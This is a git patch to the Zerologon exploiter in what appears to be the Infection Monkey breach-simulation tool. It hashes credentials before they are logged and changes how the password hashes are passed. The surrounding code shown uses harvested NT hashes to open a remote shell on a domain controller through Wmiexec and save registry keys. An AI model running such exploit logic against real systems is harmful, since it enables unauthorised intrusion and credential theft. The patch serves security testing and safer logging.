From 28edf7d2b79b017b96e414f03481c55838a5a24f Mon Sep 17 00:00:00 2001 From: Shreya Date: Wed, 24 Feb 2021 16:08:36 +0530 Subject: [PATCH] Encrypt credentials before logging --- monkey/infection_monkey/exploit/zerologon.py | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/monkey/infection_monkey/exploit/zerologon.py b/monkey/infection_monkey/exploit/zerologon.py index 5cf589fcd..dee5c349a 100644 --- a/monkey/infection_monkey/exploit/zerologon.py +++ b/monkey/infection_monkey/exploit/zerologon.py @@ -163,13 +163,13 @@ class ZerologonExploiter(HostExploiter): ] try: original_pwd_nthash = self.get_original_pwd_nthash( - username, ":".join(user_pwd_hashes) + username, user_pwd_hashes ) if original_pwd_nthash: break except Exception as e: LOG.info( - f'Credentials "{user_details}" didn\'t work. Exception: {str(e)}' + f"Credentials didn\'t work. Exception: {str(e)}" ) if not original_pwd_nthash: @@ -304,7 +304,7 @@ class ZerologonExploiter(HostExploiter): if nthash not in self._config.exploit_ntlm_hash_list: self._config.exploit_ntlm_hash_list.append(nthash) - def get_original_pwd_nthash(self, username: str, user_pwd_hashes: str) -> str: + def get_original_pwd_nthash(self, username: str, user_pwd_hashes: List[str]) -> str: if not self.save_HKLM_keys_locally(username, user_pwd_hashes): return @@ -335,13 +335,16 @@ class ZerologonExploiter(HostExploiter): finally: self.remove_locally_saved_HKLM_keys() - def save_HKLM_keys_locally(self, username: str, user_pwd_hashes: str) -> bool: - LOG.debug( - f'Starting remote shell on victim with user: "{username}" and hashes: "{user_pwd_hashes}". ' + def save_HKLM_keys_locally(self, username: str, user_pwd_hashes: List[str]) -> bool: + LOG.info( + f'Starting remote shell on victim with credentials:\n' + f'user: {username}\n' + f'hashes (SHA-512): {self._config.hash_sensitive_data(user_pwd_hashes[0])} : ' + f'{self._config.hash_sensitive_data(user_pwd_hashes[1])}' ) wmiexec = Wmiexec( - ip=self.dc_ip, username=username, hashes=user_pwd_hashes, domain=self.dc_ip + ip=self.dc_ip, username=username, hashes=':'.join(user_pwd_hashes), domain=self.dc_ip ) remote_shell = wmiexec.get_remote_shell()